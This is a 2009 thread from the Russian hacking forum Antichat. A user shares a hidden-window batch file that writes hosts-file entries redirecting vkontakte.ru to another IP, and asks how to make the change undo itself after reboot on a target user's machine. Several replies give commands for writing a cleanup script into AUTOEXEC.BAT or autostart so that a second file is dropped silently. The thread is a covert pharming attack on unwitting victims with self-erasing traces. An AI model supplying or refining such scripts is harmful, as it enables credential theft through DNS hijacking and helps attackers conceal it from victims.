Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Вопрос по bat файлу, который изменяет hosts (https://forum.antichat.xyz/showthread.php?t=137066)

microlab12 24.08.2009 16:08

Вопрос по bat файлу, который изменяет hosts

Здравствуйте, есть батник
Цитата:

cmdow @ /HID @echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo **.**.** www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo **.**.** vkontakte.ru >> %windir%\system32\drivers\etc\hosts
Что нужно дописать или как сделать, чтоб через определенное время (например после перезагрузки) файл hosts снова становился прежним?

Kaimi 24.08.2009 16:29

Видимо добавить в автозагрузку батник очищающий hosts файл

aqqa 24.08.2009 16:29

Цитата:

Сообщение от microlab12
Здравствуйте, есть батник

Что нужно дописать или как сделать, чтоб через определенное время (например после перезагрузки) файл hosts снова становился прежним?

Напиши еще 1 батник и впиздяч в автозагрузку

root_sashok 24.08.2009 16:30

Прописать в AUTOEXEC.BAT очистку hosts:

echo #clean > %SystemRoot%\system32\drivers\etc\hosts :)

microlab12 24.08.2009 16:34

Всем спасибо. Насколько я понял обязательно исп. еще один батник :( А как нить его запустить вместе с предыдущим? Или может можно в предыдущий дописать строчку, которая б очищала hosts через 20 минут например?

Если нет, то как заставить юзера открыть два батника (екзешника), это ведь уже проблематичней?

root_sashok 24.08.2009 16:40

Цитата:

Сообщение от microlab12
Всем спасибо. Насколько я понял обязательно исп. еще один батник :( А как нить его запустить вместе с предыдущим? Или может можно в предыдущий дописать строчку, которая б очищала hosts через 20 минут например?

Если нет, то как заставить юзера открыть два батника (екзешника), это ведь уже проблематичней?

AUTOEXEC.BAT запускается вместе с системой.

=Zeus= 24.08.2009 16:43

Цитата:

Сообщение от microlab12

Не нужно ничего открывать. Как только откроет первый - из него извлекай второй и пиши в автозагрузку.

microlab12 24.08.2009 16:44

=Zeus=, а не подскажешь правильный код, ато у меня несовсем работает :(

=Zeus= 24.08.2009 16:48

Цитата:

Сообщение от microlab12
=Zeus=, а не подскажешь правильный код, ато у меня несовсем работает :(

ОМГ, какой код? Выше тебе уже все написали.

Код:

echo blablabla >> %windir%\AUTOEXEC.BAT
Таким макаром пиши куда угодно и что угодно. Бла-бла это текст, который ты запишешь в файл. В твоем случее это путь к батнику.

microlab12 24.08.2009 17:02

=Zeus=, может я сейчас конкретно туплю, но как я буду знать путь ко второму батнику у юзера?

Цитата:

echo #clean > %SystemRoot%\system32\drivers\etc\hosts >> %windir%\AUTOEXEC.BAT
- вот так, насколько я понял, работать не будет?

Время: 21:54